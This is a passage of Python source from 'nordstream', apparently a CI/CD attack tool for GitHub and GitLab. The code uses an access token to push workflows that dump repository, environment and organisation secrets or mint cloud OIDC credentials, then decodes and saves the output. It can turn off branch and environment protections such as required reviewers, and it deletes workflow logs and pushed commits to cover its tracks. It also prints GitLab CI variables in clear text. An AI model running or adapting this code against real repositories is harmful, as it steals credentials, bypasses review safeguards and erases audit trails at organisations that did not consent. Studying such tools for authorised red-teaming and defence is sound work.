logging.INFO) if len(users) != 0: logger.raw(f"\t - users: {users}\n", logging.INFO) if len(teams) != 0: logger.raw(f"\t - teams: {teams}\n", logging.INFO) if len(apps) != 0: logger.raw(f"\t - apps: {apps}\n", logging.INFO) ================================================ FILE: nordstream/core/github/github.py ================================================ import logging import base64 import glob from zipfile import ZipFile from os import makedirs, chdir from os.path import exists, realpath, basename from nordstream.yaml.github import WorkflowGenerator from nordstream.yaml.custom import CustomGenerator from nordstream.core.github.protections import ( resetRequiredStatusCheck, resetRequiredPullRequestReviews, resetRestrictions, ) from nordstream.core.github.display import * from nordstream.utils.errors import GitHubError, GitPushError, GitHubBadCredentials from nordstream.utils.log import logger, NordStreamLog from nordstream.utils.helpers import randomString from nordstream.utils.constants import DEFAULT_WORKFLOW_FILENAME from nordstream.git import Git import subprocess class GitHubWorkflowRunner: _cicd = None _taskName = "command" _workflowFilename = DEFAULT_WORKFLOW_FILENAME _fileName = None _env = None _extractRepo = True _extractEnv = True _extractOrg = True _yaml = None _exploitOIDC = False _tenantId = None _subscriptionId = None _clientId = None _role = None _region = None _forceDeploy = False _disableProtections = None _writeAccessFilter = False _branchAlreadyExists = False _pushedCommitsCount = 0 _cleanLogs = True def __init__(self, cicd, env): self._cicd = cicd self._env = env self.__createLogDir() @property def extractRepo(self): return self._extractRepo @extractRepo.setter def extractRepo(self, value): self._extractRepo = value @property def extractEnv(self): return self._extractEnv @extractEnv.setter def extractEnv(self, value): self._extractEnv = value @property def extractOrg(self): return self._extractOrg @extractOrg.setter def extractOrg(self, value): self._extractOrg = value @property def workflowFilename(self): return self._workflowFilename @workflowFilename.setter def workflowFilename(self, value): self._workflowFilename = value @property def yaml(self): return self._yaml @yaml.setter def yaml(self, value): self._yaml = realpath(value) @property def exploitOIDC(self): return self._exploitOIDC @exploitOIDC.setter def exploitOIDC(self, value): self._exploitOIDC = value @property def tenantId(self): return self._tenantId @tenantId.setter def tenantId(self, value): self._tenantId = value @property def subscriptionId(self): return self._subscriptionId @subscriptionId.setter def subscriptionId(self, value): self._subscriptionId = value @property def clientId(self): return self._clientId @clientId.setter def clientId(self, value): self._clientId = value @property def role(self): return self._role @role.setter def role(self, value): self._role = value @property def region(self): return self._region @region.setter def region(self, value): self._region = value @property def disableProtections(self): return self._disableProtections @disableProtections.setter def disableProtections(self, value): self._disableProtections = value @property def writeAccessFilter(self): return self._writeAccessFilter @writeAccessFilter.setter def writeAccessFilter(self, value): self._writeAccessFilter = value @property def branchAlreadyExists(self): return self._branchAlreadyExists @branchAlreadyExists.setter def branchAlreadyExists(self, value): self._branchAlreadyExists = value @property def pushedCommitsCount(self): return self._pushedCommitsCount @pushedCommitsCount.setter def pushedCommitsCount(self, value): self._pushedCommitsCount = value @property def forceDeploy(self): return self._forceDeploy @forceDeploy.setter def forceDeploy(self, value): self._forceDeploy = value @property def cleanLogs(self): return self._cleanLogs @cleanLogs.setter def cleanLogs(self, value): self._cleanLogs = value def __createLogDir(self): self._cicd.outputDir = realpath(self._cicd.outputDir) + "/github" makedirs(self._cicd.outputDir, exist_ok=True) @staticmethod def __createWorkflowDir(): makedirs(".github/workflows", exist_ok=True) def __extractWorkflowOutput(self, repo): name = self._fileName.strip(".zip") with ZipFile(f"{self._cicd.outputDir}/{repo}/{self._fileName}") as zipOutput: zipOutput.extractall(f"{self._cicd.outputDir}/{repo}/{name}") def __extractSensitiveInformationFromWorkflowResult(self, repo, informationType="Secrets"): filePath = self.__getWorkflowOutputFileName(repo) if filePath: with open(filePath, "r") as output: # well it's working data = output.readlines()[-1].split(" ")[1] try: secrets = base64.b64decode(base64.b64decode(data)) except Exception as e: logger.exception(e) logger.success(f"{informationType}:") logger.raw(secrets, logging.INFO) with open(f"{self._cicd.outputDir}/{repo}/{informationType.lower().replace(' ', '_')}.txt", "ab") as file: file.write(secrets) def __getWorkflowOutputFileName(self, repo): name = self._fileName.strip(".zip") filePaths = glob.glob(f"{self._cicd.outputDir}/{repo}/{name}/init/*_{self._taskName}*.txt") logger.debug(filePaths) logger.debug(f"{self._cicd.outputDir}/{repo}/{name}/init/*_{self._taskName}*.txt") if len(filePaths) > 0: filePath = filePaths[0] return filePath else: logger.success(f"Data is accessible here: {self._cicd.outputDir}/{repo}/{name}/") return None def __displayCustomWorkflowOutput(self, repo): filePath = self.__getWorkflowOutputFileName(repo) if filePath: with open(filePath, "r") as output: logger.success("Workflow output:") line = output.readline() while line != "": logger.raw(line, logging.INFO) line = output.readline() def createYaml(self, repo, workflowType): workflowGenerator = WorkflowGenerator() if workflowType == "awsoidc": workflowGenerator.generateWorkflowForOIDCAWSTokenGeneration(self._role, self._region, self._env) elif workflowType == "azureoidc": workflowGenerator.generateWorkflowForOIDCAzureTokenGeneration( self._tenantId, self._subscriptionId, self._clientId, self._env ) else: repo = self._cicd.org + "/" + repo if self._env: try: secrets = self._cicd.listSecretsFromEnv(repo, self._env) except GitHubError as e: # FIXME: Raise an Exception here logger.exception(e) else: secrets = self._cicd.listSecretsFromRepo(repo) if len(secrets) > 0: workflowGenerator.generateWorkflowForSecretsExtraction(secrets, self._env) else: logger.info("No secret found.") logger.success("YAML file: ") workflowGenerator.displayYaml() workflowGenerator.writeFile(self._workflowFilename) def __extractSecretsFromRepo(self, repo): logger.info(f'Getting secrets from repo: "{repo}"') secrets = [] try: if self._extractRepo: secrets += self._cicd.listSecretsFromRepo(repo) # we can't extract dependabot secrets from regular workflows # secrets += self._cicd.listDependabotSecretsFromRepo(repo) if self._extractOrg: secrets += self._cicd.listOrganizationSecretsFromRepo(repo) # we can't extract dependabot secrets from regular workflows # secrets += self._cicd.listDependabotOrganizationSecrets() except GitHubError as e: logger.error(e) if len(secrets) > 0: workflowGenerator = WorkflowGenerator() workflowGenerator.generateWorkflowForSecretsExtraction(secrets) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "repo", self._env): self.__extractSensitiveInformationFromWorkflowResult(repo) else: logger.info("No secret found") logger.empty_line() def __extractSecretsFromSingleEnv(self, repo, env): logger.info(f'Getting secrets from environment: "{env}" ({repo})') secrets = [] try: secrets = self._cicd.listSecretsFromEnv(repo, env) except GitHubError as e: logger.error(e) if len(secrets) > 0: workflowGenerator = WorkflowGenerator() workflowGenerator.generateWorkflowForSecretsExtraction(secrets, env) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, f"env_{env}", env): self.__extractSensitiveInformationFromWorkflowResult(repo) else: logger.info("No secret found") logger.empty_line() def __extractSecretsFromAllEnv(self, repo): for env in self._cicd.listEnvFromrepo(repo): self.__extractSecretsFromSingleEnv(repo, env) def __extractSecretsFromEnv(self, repo): if self._env: self.__extractSecretsFromSingleEnv(repo, self._env) else: self.__extractSecretsFromAllEnv(repo) def __generateAndLaunchWorkflow(self, repo, workflowGenerator, outputName, env=None): policyId = waitTime = reviewers = branchPolicy = envDetails = None try: # disable env protection before launching the workflow if no '--force' and env is not null if not self._forceDeploy and env: # check protection and if enabled return the protections envDetails = self.__isEnvProtectionsEnabled(repo, env) if envDetails and len(envDetails.get("protection_rules")): # if --disable-protection disable the env protections if self._disableProtections: ( policyId, waitTime, reviewers, branchPolicy, ) = self.__disableEnvProtections(repo, envDetails) else: raise Exception("Environment protection rule enabled but '--disable-protections' not activated") # start the workflow workflowId, workflowConclusion = self.__launchWorkflow(repo, workflowGenerator) # check workflow status and get result if it's ok return self.__postProcessingWorkflow(repo, workflowId, workflowConclusion, outputName) except GitPushError as e: pass except Exception as e: logger.error(f"Error: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: # restore protections if self._disableProtections and envDetails: self.__restoreEnvProtections(repo, env, policyId, waitTime, reviewers, branchPolicy) def __launchWorkflow(self, repo, workflowGenerator): logger.verbose(f"Launching workflow.") workflowGenerator.writeFile(f".github/workflows/{self._workflowFilename}") pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() if b"Everything up-to-date" in pushOutput.communicate()[1].strip(): logger.error("Error when pushing code: Everything up-to-date") logger.warning("Your trying to push the same code on an existing branch, modify the yaml file to push it.") raise GitPushError elif pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) raise GitPushError else: self._pushedCommitsCount += 1 logger.raw(pushOutput.communicate()[1]) workflowId, workflowConclusion = self._cicd.waitWorkflow(repo, self._workflowFilename) return workflowId, workflowConclusion def __postProcessingWorkflow(self, repo, workflowId, workflowConclusion, outputName): if workflowId and workflowConclusion == "success": logger.success("Workflow has successfully terminated.") self._fileName = self._cicd.downloadWorkflowOutput( repo, f"{outputName.replace('/','_').replace(' ', '_')}", workflowId, ) self.__extractWorkflowOutput(repo) return True elif workflowId and workflowConclusion == "failure": logger.error("Workflow failure:") for reason in self._cicd.getFailureReason(repo, workflowId): logger.error(f"{reason}") return False else: return False def listGitHubRepos(self): logger.info("Listing all repos:") for r in self._cicd.repos: logger.raw(f"- {r}\n", level=logging.INFO) def listGitHubSecrets(self): logger.info("Listing secrets:") if self._extractOrg: self.__displayDependabotOrgSecrets() for repo in self._cicd.repos: logger.info(f'"{repo}" secrets') if self._extractRepo: self.__displayRepoSecrets(repo) if self._extractEnv: self.__displayEnvSecrets(repo) if self._extractOrg: self.__displayOrgSecrets(repo) def __displayRepoSecrets(self, repo): try: secrets = self._cicd.listSecretsFromRepo(repo) displayRepoSecrets(secrets) secrets = self._cicd.listDependabotSecretsFromRepo(repo) displayDependabotRepoSecrets(secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't get repo secrets.") def __displayEnvSecrets(self, repo): try: envs = self._cicd.listEnvFromrepo(repo) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't list environment.") return for env in envs: try: secrets = self._cicd.listSecretsFromEnv(repo, env) displayEnvSecrets(env, secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error(f"Can't get secrets for env {env}.") def __displayOrgSecrets(self, repo): try: secrets = self._cicd.listOrganizationSecretsFromRepo(repo) displayOrgSecrets(secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't get org secrets.") def __displayDependabotOrgSecrets(self): try: secrets = self._cicd.listDependabotOrganizationSecrets() displayDependabotOrgSecrets(secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't get org secrets.") def getRepos(self, repo): try: if repo: if exists(repo): with open(repo, "r") as file: for repo in file: self._cicd.addRepo(repo.strip()) else: self._cicd.addRepo(repo) else: self._cicd.listRepos() except GitHubBadCredentials: logger.fatal("Invalid token.") if self._writeAccessFilter: self._cicd.filterWriteRepos() if len(self._cicd.repos) == 0: if self._writeAccessFilter: logger.critical("No repository with write access found.") else: logger.critical("No repository found.") def manualCleanLogs(self): logger.info("Deleting logs") for repo in self._cicd.repos: self._cicd.cleanAllLogs(repo, self._workflowFilename) def manualCleanBranchPolicy(self): logger.info("Deleting deployment branch policy") for repo in self._cicd.repos: self._cicd.deleteDeploymentBranchPolicyForAllEnv(repo) def __runCustomWorkflow(self, repo): logger.info(f"Running custom workflow: {self._yaml}") workflowGenerator = CustomGenerator() workflowGenerator.loadFile(self._yaml) self._workflowFilename = basename(self._yaml) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "custom", self._env): self.__displayCustomWorkflowOutput(repo) logger.empty_line() def __runOIDCTokenGenerationWorfklow(self, repo): workflowGenerator = WorkflowGenerator() if self._tenantId is not None and self._clientId is not None: logger.info("Running OIDC Azure access tokens generation workflow") informationType = "OIDC access tokens" workflowGenerator.generateWorkflowForOIDCAzureTokenGeneration( self._tenantId, self._subscriptionId, self._clientId, self._env ) else: logger.info("Running OIDC AWS credentials generation workflow") informationType = "OIDC credentials" workflowGenerator.generateWorkflowForOIDCAWSTokenGeneration(self._role, self._region, self._env) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "oidc", self._env): self.__extractSensitiveInformationFromWorkflowResult(repo, informationType=informationType) logger.empty_line() def __runSecretsExtractionWorkflow(self, repo): if self._extractRepo or self._extractOrg: self.__extractSecretsFromRepo(repo) if self._extractEnv: self.__extractSecretsFromEnv(repo) def __deleteRemoteBranch(self): logger.verbose("Deleting remote branch") deleteOutput = Git.gitDeleteRemote(self._cicd.branchName) deleteOutput.wait() if deleteOutput.returncode != 0: logger.error(f"Error deleting remote branch {self._cicd.branchName}") logger.raw(deleteOutput.communicate()[1], logging.INFO) return False return True def __clean(self, repo, cleanRemoteLogs=True): if self._pushedCommitsCount > 0: if cleanRemoteLogs: logger.info("Cleaning logs.") try: self._cicd.cleanAllLogs(repo, self._workflowFilename) except Exception as e: logger.error(f"Error while cleaning logs: {e}") if self._cicd.isGHSToken(): logger.warn(f"This might be due to the GHS token.") logger.verbose("Cleaning commits.") if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName: Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount) else: if not self.__deleteRemoteBranch(): logger.info("Cleaning remote branch.") # rm everything if we can't delete the branch (only leave one file otherwise it will try to rm the branch) Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True) def start(self): for repo in self._cicd.repos: logger.success(f'"{repo}"') url = f"https://foo:{self._cicd.token}@github.com/{repo}" Git.gitClone(url) repoShortName = repo.split("/")[1] chdir(repoShortName) self._pushedCommitsCount = 0 self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) try: # check and disable branch protection rules protections = None if not self._forceDeploy: protections = self.__checkAndDisableBranchProtectionRules(repo) self.__createWorkflowDir() self.__dispatchWorkflow(repo) except KeyboardInterrupt: pass except Exception as e: logger.error(f"Error: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: self.__clean(repo, cleanRemoteLogs=self._cleanLogs) # if we are working with the default nord-stream branch we managed to # delete the branch during the previous clean operation if self._cicd.branchName != self._cicd.defaultBranchName: if protections: self.__resetBranchProtectionRules(repo, protections) chdir("../") subprocess.Popen(f"rm -rfd ./{repoShortName}", shell=True).wait() logger.info(f"Check output: {self._cicd.outputDir}") def __dispatchWorkflow(self, repo): if self._yaml: self.__runCustomWorkflow(repo) elif self._exploitOIDC: self.__runOIDCTokenGenerationWorfklow(repo) else: self.__runSecretsExtractionWorkflow(repo) def __checkAllEnvSecurity(self, repo): try: for env in self._cicd.listEnvFromrepo(repo): self.__checkSingleEnvSecurity(repo, env) except GitHubError as e: logger.error(f"Error while getting env security: {e}") if self._cicd.isGHSToken(): logger.warn(f"This might be due to the GHS token.") def __checkSingleEnvSecurity(self, repo, env): envDetails = self._cicd.getEnvDetails(repo, env) displayEnvSecurity(envDetails) def checkBranchProtections(self): for repo in self._cicd.repos: logger.info(f'Checking security: "{repo}"') # TODO: check branch wide protection # For now, it's not available in the REST API. It could still be performed using the GraphQL API. # https://github.com/github/safe-settings/issues/311 protectionEnabled = False url = f"https://foo:{self._cicd.token}@github.com/{repo}" Git.gitClone(url) repoShortName = repo.split("/")[1] chdir(repoShortName) self._pushedCommitsCount = 0 self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) try: protectionEnabled, protection = self.__checkAndGetBranchProtectionRules(repo) if protectionEnabled: if protection: displayBranchProtectionRules(protection) else: logger.info( "Not enough privileges to get protection rules or 'Restrict pushes that create matching branches' is enabled. Check another branch." ) self.__checkAllEnvSecurity(repo) except Exception as e: if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: # don't clean remote logs as we didn't push any workflow here. self.__clean(repo, cleanRemoteLogs=False) chdir("../") subprocess.Popen(f"rm -rfd ./{repoShortName}", shell=True).wait() def _checkBranchProtectionRules(self, repo): protectionEnabled = False try: protectionEnabled = self._cicd.checkBranchProtectionRules(repo) except GitHubError: pass if not protectionEnabled: fileName = randomString(5) + "_test_push.md" Git.gitCreateDummyFile(fileName) pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() if pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) return True else: self._pushedCommitsCount += 1 try: protectionEnabled = self._cicd.checkBranchProtectionRules(repo) except GitHubError: pass return protectionEnabled def __checkAndDisableBranchProtectionRules(self, repo): protectionEnabled, protection = self.__checkAndGetBranchProtectionRules(repo) if protectionEnabled: if protection: displayBranchProtectionRules(protection) else: logger.info( "Not enough privileges to get protection rules or 'Restrict pushes that create matching branches' is enabled. Check another branch." ) if protection and self.disableProtections: if self._cicd.branchName != self._cicd.defaultBranchName: logger.warning("Removing branch protection, wait until it's restored.") else: # no need to restore branch protection if we are working with the default # nord-stream branch logger.warning("Removing branch protection.") self._cicd.disableBranchProtectionRules(repo) return protection elif self.disableProtections: # if we can't list protection this means that we don't have enough privileges raise Exception( "Not enough privileges to disable protection rules or 'Restrict pushes that create matching branches' is enabled. Check another branch." ) else: raise Exception("branch protection rule enabled but '--disable-protections' not activated") return None def __checkAndGetBranchProtectionRules(self, repo): protectionEnabled = self._checkBranchProtectionRules(repo) if protectionEnabled: logger.info(f'Found branch protection rule on "{self._cicd.branchName}" branch') try: protection = self._cicd.getBranchesProtectionRules(repo) return True, protection except GitHubError: return True, None else: logger.info(f'No branch protection rule found on "{self._cicd.branchName}" branch') return False, None def __isEnvProtectionsEnabled(self, repo, env): envDetails = self._cicd.getEnvDetails(repo, env) protectionRules = envDetails.get("protection_rules") if len(protectionRules) > 0: displayEnvSecurity(envDetails) return envDetails else: logger.verbose("No environment protection rule found") return False return policyId, waitTime, reviewers, branchPolicy def __disableEnvProtections(self, repo, envDetails): protectionRules = envDetails.get("protection_rules") branchPolicy = envDetails.get("deployment_branch_policy") waitTime = 0 reviewers = [] policyId = None env = envDetails.get("name") try: logger.warning("Modifying env protection, wait until it's restored.") if branchPolicy and branchPolicy.get("custom_branch_policies", False): policyId = self._cicd.createDeploymentBranchPolicy(repo, env) for protection in protectionRules: if protection.get("type") == "required_reviewers": for reviewer in protection.get("reviewers"): reviewers.append( { "type": reviewer.get("type"), "id": reviewer.get("reviewer").get("id"), } ) if protection.get("type") == "wait_timer": waitTime = protection.get("wait_timer") self._cicd.modifyEnvProtectionRules(repo, env, 0, [], branchPolicy) except GitHubError: raise Exception("Environment protection rule enabled but not enough privileges to disable it.") return policyId, waitTime, reviewers, branchPolicy def __restoreEnvProtections(self, repo, env, policyId, waitTime, reviewers, branchPolicy): logger.warning("Restoring env protections.") if policyId is not None: self._cicd.deleteDeploymentBranchPolicy(repo, env) self._cicd.modifyEnvProtectionRules(repo, env, waitTime, reviewers, branchPolicy) def describeToken(self): if self._cicd.isGHSToken(): response = self._cicd.getLoginWithGraphQL().json() logger.info("Token information:") login = response.get("data").get("viewer").get("login") if login != None: logger.raw(f"\t- Login: {login}\n", logging.INFO) else: response = self._cicd.getUser() headers = response.headers response = response.json() logger.info("Token information:") login = response.get("login") if login != None: logger.raw(f"\t- Login: {login}\n", logging.INFO) isAdmin = response.get("site_admin") if isAdmin != None: logger.raw(f"\t- IsAdmin: {isAdmin}\n", logging.INFO) email = response.get("email") if email != None: logger.raw(f"\t- Email: {email}\n", logging.INFO) id = response.get("id") if id != None: logger.raw(f"\t- Id: {id}\n", logging.INFO) bio = response.get("bio") if bio != None: logger.raw(f"\t- Bio: {bio}\n", logging.INFO) company = response.get("company") if company != None: logger.raw(f"\t- Company: {company}\n", logging.INFO) tokenScopes = headers.get("x-oauth-scopes") if tokenScopes != None: scopes = tokenScopes.split(", ") if len(scopes) != 0: logger.raw(f"\t- Token scopes:\n", logging.INFO) for scope in scopes: logger.raw(f"\t - {scope}\n", logging.INFO) def __resetBranchProtectionRules(self, repo, protections): logger.warning("Restoring branch protection.") data = {} data["required_status_checks"] = resetRequiredStatusCheck(protections) data["required_pull_request_reviews"] = resetRequiredPullRequestReviews(protections) data["restrictions"] = resetRestrictions(protections) data["enforce_admins"] = protections.get("enforce_admins").get("enabled") data["allow_deletions"] = protections.get("allow_deletions").get("enabled") data["allow_force_pushes"] = protections.get("allow_force_pushes").get("enabled") data["block_creations"] = protections.get("block_creations").get("enabled") res = self._cicd.updateBranchesProtectionRules(repo, data) msg = res.get("message") if msg: logger.error(f"Fail to restore protection: {msg}") logger.info(f"Raw protections: {protections}") ================================================ FILE: nordstream/core/github/protections.py ================================================ from collections import defaultdict def resetRequiredStatusCheck(protections): res = defaultdict(dict) required_status_checks = protections.get("required_status_checks") if required_status_checks: res["strict"] = required_status_checks.get("strict") res["contexts"] = required_status_checks.get("contexts") if required_status_checks.get("checks"): res["checks"] = required_status_checks.get("checks") return dict(res) else: return None def resetRequiredPullRequestReviews(protections): res = defaultdict(dict) required_pull_request_reviews = protections.get("required_pull_request_reviews") if required_pull_request_reviews: if required_pull_request_reviews.get("dismissal_restrictions"): res["dismissal_restrictions"]["users"] = getUsersArray( required_pull_request_reviews.get("dismissal_restrictions").get("users") ) res["dismissal_restrictions"]["teams"] = getTeamsOrAppsArray( required_pull_request_reviews.get("dismissal_restrictions").get("teams") ) res["dismissal_restrictions"]["apps"] = getTeamsOrAppsArray( required_pull_request_reviews.get("dismissal_restrictions").get("apps") ) if required_pull_request_reviews.get("dismiss_stale_reviews"): res["dismiss_stale_reviews"] = required_pull_request_reviews.get("dismiss_stale_reviews") if required_pull_request_reviews.get("require_code_owner_reviews"): res["require_code_owner_reviews"] = required_pull_request_reviews.get("require_code_owner_reviews") if required_pull_request_reviews.get("required_approving_review_count"): res["required_approving_review_count"] = required_pull_request_reviews.get( "required_approving_review_count" ) if required_pull_request_reviews.get("require_last_push_approval"): res["require_last_push_approval"] = required_pull_request_reviews.get("require_last_push_approval") if required_pull_request_reviews.get("bypass_pull_request_allowances"): res["bypass_pull_request_allowances"]["users"] = getUsersArray( required_pull_request_reviews.get("bypass_pull_request_allowances").get("users") ) res["bypass_pull_request_allowances"]["teams"] = getTeamsOrAppsArray( required_pull_request_reviews.get("bypass_pull_request_allowances").get("teams") ) res["bypass_pull_request_allowances"]["apps"] = getTeamsOrAppsArray( required_pull_request_reviews.get("bypass_pull_request_allowances").get("apps") ) return dict(res) else: return None def resetRestrictions(protections): res = defaultdict(dict) restrictions = protections.get("restrictions") if restrictions: res["users"] = getUsersArray(restrictions.get("users")) res["teams"] = getTeamsOrAppsArray(restrictions.get("teams")) res["apps"] = getTeamsOrAppsArray(restrictions.get("apps")) return dict(res) else: return None def getUsersArray(users): res = [] for user in users: res.append(user.get("login")) return res def getTeamsOrAppsArray(data): res = [] for e in data: res.append(e.get("slug")) return res ================================================ FILE: nordstream/core/gitlab/gitlab.py ================================================ import logging from urllib.parse import urlparse from os import makedirs, chdir from os.path import exists, realpath from datetime import datetime from nordstream.utils.log import logger from nordstream.git import Git import subprocess import time from nordstream.utils.errors import GitLabError from nordstream.yaml.gitlab import GitLabPipelineGenerator class GitLabRunner: _cicd = None _writeAccessFilter = False _extractProject = True _extractGroup = True _extractInstance = True _yaml = None _branchAlreadyExists = False _fileName = None _cleanLogs = True _sleepTime = 0 _localPath = None @property def writeAccessFilter(self): return self._writeAccessFilter @writeAccessFilter.setter def writeAccessFilter(self, value): self._writeAccessFilter = value @property def extractProject(self): return self._extractProject @extractProject.setter def extractProject(self, value): self._extractProject = value @property def extractGroup(self): return self._extractGroup @extractGroup.setter def extractGroup(self, value): self._extractGroup = value @property def extractInstance(self): return self._extractInstance @extractInstance.setter def extractInstance(self, value): self._extractInstance = value @property def yaml(self): return self._yaml @yaml.setter def yaml(self, value): self._yaml = realpath(value) @property def branchAlreadyExists(self): return self._branchAlreadyExists @branchAlreadyExists.setter def branchAlreadyExists(self, value): self._branchAlreadyExists = value @property def cleanLogs(self): return self._cleanLogs @cleanLogs.setter def cleanLogs(self, value): self._cleanLogs = value @property def sleepTime(self): return self._sleepTime @sleepTime.setter def sleepTime(self, value): self._sleepTime = int(value) @property def localPath(self): return self._localPath @localPath.setter def localPath(self, value): if exists(value): self._localPath = value else: logger.critical("Invalid local project path.") def __init__(self, cicd): self._cicd = cicd self.__createLogDir() def __createLogDir(self): self._cicd.outputDir = realpath(self._cicd.outputDir) + "/gitlab" makedirs(self._cicd.outputDir, exist_ok=True) def getProjects(self, project, strict=False, membership=False): if project: if exists(project): logger.info(f"Getting GitLab projects of a file: {project}") with open(project, "r") as file: for p in file: self._cicd.addProjects( project=p.strip(), filterWrite=self._writeAccessFilter, strict=strict, membership=membership ) else: logger.info(f"Getting GitLab project: {project}") self._cicd.addProjects( project=project, filterWrite=self._writeAccessFilter, strict=strict, membership=membership ) else: logger.info(f"Listing GitLab projects") self._cicd.addProjects(filterWrite=self._writeAccessFilter, membership=membership) if len(self._cicd.projects) == 0: if self._writeAccessFilter: logger.critical("No repository with write access found.") else: logger.critical("No repository found.") def getGroups(self, group): if group: if exists(group): logger.info(f"Getting GitLab groups of a file: {group}") with open(group, "r") as file: for p in file: self._cicd.addGroups(group) else: logger.info(f"Getting GitLab group: {group}") self._cicd.addGroups(group) else: logger.info(f"Listing GitLab groups") self._cicd.addGroups() if len(self._cicd.groups) == 0: logger.error("No group found.") def listGitLabRunners(self): logger.info("Listing GitLab runners") res = False if self._extractProject: res |= self.__listGitLabProjectRunners() if not res: logger.warning("You don't have access to any runner or job") def __mergeLists(self, current, new, key): current[key] = list(set(current[key] + new[key])) new[key] = current[key] def __mergeRunners(self, current, new): for runner in new: existing = next((c for c in current if c["id"] == runner["id"]), None) if not existing: current.append(runner) continue date = lambda d: datetime.strptime(d, "%Y-%m-%dT%H:%M:%S.%fZ") self.__mergeLists(existing, runner, "projects") self.__mergeLists(existing, runner, "tags") if date(runner["contacted_at"]) > date(existing["contacted_at"]): existing.update(runner) def __listGitLabProjectRunners(self): res = False runners = [] for project in self._cicd.projects: self.__mergeRunners(runners, self._cicd.listRunnersFromProject(project)) for runner in runners: res = True logger.info( f'{runner["id"]} (scope: {runner["runner_type"].replace("_type", "")}, executor: {runner["executor"]}, accesslevel: {runner["access_level"]})' ) logger.raw(f' - status: {runner["status"].lower()} (lastseen: {runner["contacted_at"]})\n', logging.INFO) logger.raw(f' - description: {runner["description"] or "n/a"}\n', logging.INFO) logger.raw(f' - tags: {runner["tags"]}\n', logging.INFO) logger.raw(f' - platform: {runner["platform"]} ({runner["architecture"]})\n', logging.INFO) logger.raw(f' - ipaddress: {runner["ip_address"]}\n', logging.INFO) if runner["projects"]: logger.raw(f" - projects:\n", logging.INFO) for project in runner["projects"]: logger.raw(f" - {project}\n", logging.INFO) return res def listGitLabSecrets(self): logger.info("Listing GitLab secrets") res = False if self._extractInstance: res |= self.__listGitLabInstanceSecrets() if self._extractGroup: res |= self.__listGitLabGroupSecrets() if self._extractProject: res |= self.__listGitLabProjectSecrets() res |= self.__listGitLabProjectSecureFiles() if not res: logger.warning( "You don't have access to any secret, try to deploy a pipeline and exfiltrate environment variables" ) def __listGitLabProjectSecrets(self): res = False for project in self._cicd.projects: try: time.sleep(self._sleepTime) res |= self.__displayProjectVariables(project) except Exception as e: logger.error(f"Error while listing secrets for {project.get('name')}: {e}") return res def __listGitLabProjectSecureFiles(self): res = False for project in self._cicd.projects: try: time.sleep(self._sleepTime) res |= self.__displayProjectSecureFiles(project) except Exception as e: logger.error(f"Error while listing secure files for {project.get('name')}: {e}") return res def __listGitLabGroupSecrets(self): res = False for group in self._cicd.groups: try: time.sleep(self._sleepTime) res |= self.__displayGroupVariables(group) except Exception as e: logger.error(f"Error while listing secrets for {group.get('name')}: {e}") return res def __listGitLabInstanceSecrets(self): try: return self.__displayInstanceVariables() except Exception as e: logger.error(f"Error while listing instance secrets: {e}") return False def __displayProjectVariables(self, project): projectName = project.get("path_with_namespace") try: variables = self._cicd.listVariablesFromProject(project) if len(variables) != 0: logger.info(f'"{projectName}" project variables') for variable in variables: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / hidden:{variable["hidden"]})\n', logging.INFO, ) variables_inherited = self._cicd.listInheritedVariablesFromProject(project) if len(variables_inherited) != 0: logger.info(f'"{projectName}" inherited group variables') for variable in variables_inherited: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / hidden:{variable["hidden"]})\n', logging.INFO, ) if (len(variables) > 0) or (len(variables_inherited) > 0): return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info(f'"{projectName}" variables') logger.error(f"\t{e}") return False def __displayProjectSecureFiles(self, project): projectName = project.get("path_with_namespace") try: secFiles = self._cicd.listSecureFilesFromProject(project) if len(secFiles) != 0: logger.info(f'"{projectName}" secure files') for file in secFiles: logger.raw(f'\t- {file["name"]} ({file["path"]})\n', logging.INFO) return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info(f'"{projectName}" secure files') logger.error(f"\t{e}") return False def __displayGroupVariables(self, group): groupPath = group.get("full_path") try: variables = self._cicd.listVariablesFromGroup(group) if len(variables) != 0: logger.info(f'"{groupPath}" group variables:') for variable in variables: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / hidden:{variable["hidden"]})\n', logging.INFO, ) return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info(f'"{groupPath}" group variables:') logger.error(f"\t{e}") return False def __displayInstanceVariables(self): try: variables = self._cicd.listVariablesFromInstance() if len(variables) != 0: logger.info("Instance variables:") for variable in variables: logger.raw( f'\t- {variable["key"]}={variable["value"]} (protected:{variable["protected"]} / hidden:{variable["hidden"]})\n', logging.INFO, ) return True except GitLabError as e: if logger.getEffectiveLevel() < logging.INFO: logger.info("Instance variables:") logger.error(f"\t{e}") return False def listGitLabProjects(self): 